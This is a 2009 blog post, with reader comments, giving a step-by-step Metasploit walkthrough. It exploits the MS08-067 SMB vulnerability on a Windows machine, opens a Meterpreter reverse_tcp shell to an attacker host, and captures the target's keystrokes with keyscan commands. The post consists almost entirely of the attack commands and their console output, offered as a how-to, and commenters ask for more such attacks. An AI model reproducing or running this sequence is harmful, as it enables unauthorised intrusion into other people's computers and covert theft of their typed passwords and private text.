Capturing Keystrokes With Metasploit

June 22, 2009 – 1:09 PM

I was contacted privately about this, so I thought I would post a step-by-step guide on how to capture keystrokes from a target machine using Metasploit.


Instead of posting a ton of screenshots, I will provide the commands in text below, step-by-step:

msf > use exploit/windows/smb/ms08_067_netapi (only an example – use whatever exploit the target machine is vulnerable to)
msf exploit(ms08_067_netapi) > set rhost (target)
rhost =>
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost (attacker)
lhost =>
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST
[*] Started reverse handler
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->

meterpreter > keyscan_start
Starting the keystroke sniffer…

(target machine)
meterpreter > keyscan_stop
Stopping the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Top secret text.  Don’t tell my wife.
meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit

  1. 4 Responses to “Capturing Keystrokes With Metasploit”

  2. I have Framework 3.2 already and always do svn update. version update is already 6994.
    But when I check the meterpreter’s directory and looking in .rb file, i cant find the grabdesktop,keyscan_start…..

    I only have 320 exploits 217 payloads. I don’t understand why I don’t have those scripts from meterpreter.

    I made a svn co https://metasploit…../svn/framework3/trunk

    .. -> succesfull but still the number of exploits are the same
    and no grabdesktop,keyscan_start……

    Please help me how to update my exploits and include new scripts for meterpreter

    By Yaggi on Sep 3, 2009

  3. Yaggi,

    If you look at the first screenshot you will see that I’m using the 3.3-dev version of Metasploit. I don’t think these new features will be in 3.2.

    By manunkind on Sep 3, 2009

  4. Great, I thought it is possible for 3.2
    Your post with screenshot is awesome. keep it up.Please bring more metasploit samples in here

    By Yaggi on Sep 6, 2009

  5. Brother Your rock!! This is awesome !! A beautiful 4ttack.

    By Yom on Jun 1, 2011

You must be logged in to post a comment.